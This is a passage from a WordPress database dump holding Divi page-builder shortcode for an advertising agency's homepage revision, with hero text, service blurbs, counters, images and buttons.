button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-05 07:28:16','2020-08-05 07:28:16','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/05/134-revision-v1/',0,'revision','',0),(425,1,'2020-08-05 07:28:38','2020-08-05 07:28:38','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/63368-2.png\" alt=\"Why We\" title_text=\"Best Agency to choose\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row 